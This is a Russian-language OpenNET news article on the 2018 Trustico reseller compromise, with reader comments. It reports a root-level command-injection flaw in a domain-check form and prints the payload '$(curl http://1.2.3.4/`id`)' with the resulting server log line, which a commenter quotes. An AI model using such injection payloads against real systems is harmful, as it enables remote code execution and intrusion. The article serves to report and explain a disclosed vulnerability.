The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги | ]

02.03.2018 09:05  Ожидается отзыв всех остальных сертификатов Trustico из-за полной компрометации сервера

Вчерашняя история с отзывом 23 тысяч сертификатов, выданных через реселлера Trustico, получала неожиданное продолжение. Один из исследователей безопасности раскрыл тривиальную уязвимость в web-интерфейсе, позволяющую получить root-доступ на сервер.

Проблема свидетельствует о наплевательском отношении к безопасности и косвенно подтверждает, что действия Trustico по отзыву сертификатов были связаны с инцидентом с безопасностью, несмотря на то, что компания отвергала подобные предположения. По информации от исследователя, продемонстрировавшего уязвимость, о проблеме было известно ранее и он почерпнул сведения из публичных источников. Суть выявленной уязвимости в передаче пользовательского ввода в обработчик на shell без экранирования спецсимволов. В частности, если ввести shell-операторы в поле ввода домена в форме проверки корректности установки сертификата, то они будут исполнены на сервере с правами root.

Например, при вводе вместо имени проверяемого домена строки "$(curl http://1.2.3.4/`id`)" на хост 1.2.3.4 придёт запрос вида:


   1.2.3.4 - [02/Mar/2018:09:52:14] "GET /uid=0(root) HTTP/1.1" 404 209 "-" "curl/7.29.0"

В настоящее время сайт Trustico выведен из строя и недоступен. Пока непонятно позволял ли взломанный сервер получить доступ к архиву закрытых ключей клиентских сертификатов, но до выключения сервера одному из экспериментаторов удалось найти в конфигурации web-сервера закрытый ключ для SSL-сертификата домена "*.trustico.com", который хранился на скомпрометированном сервере.

Проблема также затронула партнёрский сайт SSLDirect.com, который размещался на том же сервере, и генерировал сертификаты через Trustico, характеризуя данную компанию как одного из ведущих мировых центров сертификации ("Trustico is one of the worlds leading SSL Certificate issuers").

Представители удостоверяющих центров DigiCert и Comodo, которые выступали в роли партнёров Trustico, пока никак не отреагировали на проблему, но в соответствии с правилами можно ожидать отзыва всех выданных через Trustico сертификатов в течение 24 часов. При этом представители Trustico заявили, что скомпрометированный сервер не имел доступа к информационным базам, в которых хранились данные клиентов.

  1. Главная ссылка к новости (https://www.reddit.com/r/sysad...)
  2. OpenNews: 23 тысячи SSL-сертификатов будут отозваны из-за инцидента в Trustico
  3. OpenNews: Поставлена под сомнение валидность 30 тысяч HTTPS-сертификатов удостоверяющего центра Symantec
  4. OpenNews: Symantec продаёт удостоверяющий центр компании DigiCert
  5. OpenNews: Вступили в силу требования к удостоверяющим центрам по проверке CAA-записей в DNS
  6. OpenNews: Let's Encrypt занял 36% рынка удостоверяющих центров
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: trustico, ca, cert
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение Ajax/Линейный | Показать все | RSS
 
  • 1.1, Аноним, 09:18, 02/03/2018 [ответить] [смотреть все]    [к модератору]
  • +30 +/
    Что вы делаете, прекратите! Я попкорн уже не успеваю из аргентины подвозить
     
     
  • 2.23, user, 12:27, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]
  • –1 +/
    Из аргентинской муки нужно делать блины на лопате.
     
  • 1.2, Аноним, 09:19, 02/03/2018 [ответить] [смотреть все]    [к модератору]
  • +/
    "Гори-гори ясно, чтобы не погасло!"
     
     
  • 2.5, Аноним, 09:24, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]
  • +/
    Earth, Wind Fire - Boogie Wonderland Scooter - Fire... весь текст скрыт [показать] [показать ветку]
     
  • 2.22, Аноним, 12:21, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +1 +/
    The roof The roof The roof is on fire We don t need no water Let the motherfuck... весь текст скрыт [показать] [показать ветку]
     
  • 1.3, Аноним, 09:22, 02/03/2018 [ответить] [смотреть все]    [к модератору]  
  • +/
    урок коррупционерам
     
     
  • 2.11, Аноним, 10:15, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • +/
    я Вас умоляю, просто подкорректируют планы безотносительно к сути происшествия
     
     
  • 3.18, Аноним, 11:07, 02/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    разумеется, на пути жадности нет преград
     
  • 2.44, Michael Shigorin, 10:52, 03/03/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • –5 +/
    > урок коррупционерам

    Это Вы про тот почтовый сервер Хиллари?

     
     
  • 3.47, Аноним, 13:28, 03/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    Всем кто смеет хреново работать и раздолбайствовать.
     
     
  • 4.54, Dmitry77, 00:35, 04/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Ну как сказать хреново работает - тот кто принимает стандарты Например DNS С... весь текст скрыт [показать]
     
  • 3.48, Аноним, 13:42, 03/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Нет, про получателей отката от комода за переход к ним с дигисерта Такое впечат... весь текст скрыт [показать]
     
  • 1.4, A.Stahl, 09:23, 02/03/2018 [ответить] [смотреть все]    [к модератору]  
  • +2 +/
    Ну облажались. Бывает. Trustico это маленький посредник. Возможно там в штате 1 человек, он же хозяин-администратор-программист. Совершенно обычная ситуация. Ничего нового.
     
  • 1.6, commiethebeastie, 09:25, 02/03/2018 [ответить] [смотреть все]    [к модератору]  
  • +/
    >http://1.2.3.4/'id'

    CVSS 11?

     
  • 1.8, Аноним, 09:26, 02/03/2018 [ответить] [смотреть все]     [к модератору]  
  • +/
    Это бич IT, в энтерпрайз нужны внимательные, трудолюбивые и скромные, но так как... весь текст скрыт [показать]
     
     
  • 2.13, angra, 10:34, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +5 +/
    А деньги есть только на студентов и индусов, так как почти все средства уходят н... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.34, Аноним, 18:42, 02/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    Так снесите Бастилию )
     
  • 2.17, Аноним, 11:04, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +/
    послушные, согласные, умеющие в минимум полезных действий, внимание и трудолюбие... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.24, Аноним, 12:32, 02/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • –1 +/
    В стартапах, да В энтерпрайзе наоборот ... весь текст скрыт [показать]
     
  • 2.27, Аноним, 13:05, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +/
    проблема в тех кто платит, не принёс новую звёздную идею - не достоин хорошего д... весь текст скрыт [показать] [показать ветку]
     
  • 1.9, Аноним, 09:28, 02/03/2018 [ответить] [смотреть все]    [к модератору]  
  • +1 +/
    Уволенный из Equifax администратор, перешёл на работу в Trustico?
     
     
  • 2.10, нах, 09:52, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • –3 +/
    уволенный поехал обратно в свою деревню под Бангалором, в трех тапках - два на н... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.45, mickvav, 11:18, 03/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    Вы так говорите, как будто чувак из мухосранска не мог админить оносайтик...
     
  • 1.15, Аноним, 10:37, 02/03/2018 [ответить] [смотреть все]     [к модератору]  
  • –1 +/
    И не отреагируют, сколько мы ни будем ожидать ... весь текст скрыт [показать]
     
  • 1.16, Аноним, 10:47, 02/03/2018 [ответить] [смотреть все]     [к модератору]  
  • +1 +/
    При этом представители Trustico заявили, что скомпрометированный сервер не имел ... весь текст скрыт [показать]
     
     
  • 2.19, Аноним, 11:12, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +2 +/
    Я думаю, что эта фраза в конце новости подается просто для особого смака ... весь текст скрыт [показать] [показать ветку]
     
  • 2.20, Аноним, 11:27, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +/
    в выигрыше остались те, кто доверился малозащищенному реселлеру - все они узнали... весь текст скрыт [показать] [показать ветку]
     
  • 1.21, Zlo, 11:40, 02/03/2018 [ответить] [смотреть все]    [к модератору]  
  • +1 +/
    Вот даже интересно после появление Let's Encrypt пошла какая то полоса неудач у всех остальных сертификаторов......прям совпадение.....
     
     
  • 2.25, Аноним, 12:47, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • –1 +/
    Не думаю
     
  • 2.26, Аноним, 12:57, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • +/
    А сам letsencrypt можно рассматривать как монокультуру...
     
  • 2.49, Аноним, 13:44, 03/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +/
    Это не совпадение, а следствие комод теряет доход и пытается подмять остатки би... весь текст скрыт [показать] [показать ветку]
     
  • 1.28, Дуплик, 13:40, 02/03/2018 [ответить] [смотреть все]    [к модератору]  
  • –1 +/
    Когда уже сделают принципиально новый HTTPSSS на блокчейне? HTTPS абсолютно несекьюрный.
     
     
  • 2.29, Дудосер, 14:15, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • +1 +/
    А за щеку откладывать можно будет?
     
  • 2.30, Некто, 14:16, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • –1 +/
    Ага И все браузеры, использующие HTTPSSS на блокчейне , в свободное время буду... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.31, ананас, 14:27, 02/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    Да и ещё выкачивать уже подписанные сертификаты чтобы проверять локально
     
  • 3.35, Диалектик, 18:58, 02/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Зачем самостоятельно что-то майнить Вон возьми тот же блокчейн namecoin и испол... весь текст скрыт [показать]
     
  • 2.41, Аноним, 08:11, 03/03/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • +/
    но ведь namecoin уже есть.
     
  • 1.32, mumu, 16:54, 02/03/2018 [ответить] [смотреть все]    [к модератору]  
  • +3 +/
    > передаче пользовательского ввода в обработчик на shell без экранирования спецсимволов.

    #$%^&*! Всё же запрет на пользование интернетом хотя бы до окончания начальной школы имеет под собой серьёзные аргументы.

     
     
  • 2.33, Некто, 17:10, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +3 +/
    А еще они будут исполнены на сервере с правами root , что однозначно указыв... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.36, Аноним, 19:23, 02/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    если форенсик сможет с убедительной вероятностью указать на конкретное лицо, с к... весь текст скрыт [показать]
     
  • 1.37, кек, 21:31, 02/03/2018 [ответить] [смотреть все]    [к модератору]  
  • +2 +/
    >Суть  выявленной уязвимости в передаче пользовательского ввода в обработчик на  shell без экранирования спецсимволов

    шел 2018 год...

     
  • 1.38, Аноним, 22:23, 02/03/2018 [ответить] [смотреть все]     [к модератору]  
  • –2 +/
    Где то видел статью о том что дешевле быть взломанным чем тратить деньги на грам... весь текст скрыт [показать]
     
     
  • 2.39, Аноним, 23:10, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • +1 +/
    Дешевле не значит выгоднее.
     
  • 2.40, Аноним, 00:17, 03/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +2 +/
    Еще дешевле вообще не заморачиваться с сайтами, не делать их вообще Расходов ро... весь текст скрыт [показать] [показать ветку]
     
  • 2.42, Ordu, 08:45, 03/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +/
    Поэтому сейчас в США даже республиканцы задумываются о том, что сфера IT требует... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.43, Аноним, 09:36, 03/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    никто не застрахован от ошибок, можно учиться жить без компьютера, пока регулято... весь текст скрыт [показать]
     
  • 3.53, Аноним, 18:07, 03/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    непонял, это как: "запретить взламывать" или "запретить быть взламываемыми"?
     
  • 1.46, Тот_Самый_Анонимус, 11:41, 03/03/2018 [ответить] [смотреть все]    [к модератору]  
  • +/
    В общем, сам принцип доверенных сертификатов пошёл по песде. Набуя вообще эти списки доверенных по умолчанию? Пусть каждый сам решает кому доверять, или ставит дополнение, которое решает за него.
     
  • 1.52, Kuromi, 17:42, 03/03/2018 [ответить] [смотреть все]    [к модератору]  
  • +/
    А в это время в Firefox Nightly уже (временно) выключили блокирование сертификатов от Symantec - слишком уж много сайтов поломалось. Подождут пока сиуация не стабилизируется, все таки релиз ФФ60 в котормо будет эта блокировка - в мае.
    Хорошая новость же что некоторые слоупоки-админы все таки начали обновление сертификатов на затронутых сайтах, наконец-то.
     
     
  • 2.55, Kuromi, 06:05, 05/03/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • +/
    > А в это время в Firefox Nightly уже (временно) выключили блокирование сертификатов
    > от Symantec - слишком уж много сайтов поломалось. Подождут пока сиуация
    > не стабилизируется, все таки релиз ФФ60 в котормо будет эта блокировка
    > - в мае.
    > Хорошая новость же что некоторые слоупоки-админы все таки начали обновление сертификатов
    > на затронутых сайтах, наконец-то.

    И, само смешное, спустя пару дней включили назад.

     
  • 1.56, Аноним, 03:23, 06/03/2018 [ответить] [смотреть все]     [к модератору]  
  • +/
    Прекрасно Находил такие дыры лет 12 назад много где, но не думал, что такое до ... весь текст скрыт [показать]
     

     Добавить комментарий
    Имя:
    E-Mail:
    Заголовок:
    Текст:


      Закладки на сайте
      Проследить за страницей
    Created 1996-2018 by Maxim Chirkov  
    ДобавитьПоддержатьВебмастеруГИД  
    Hosting by Ihor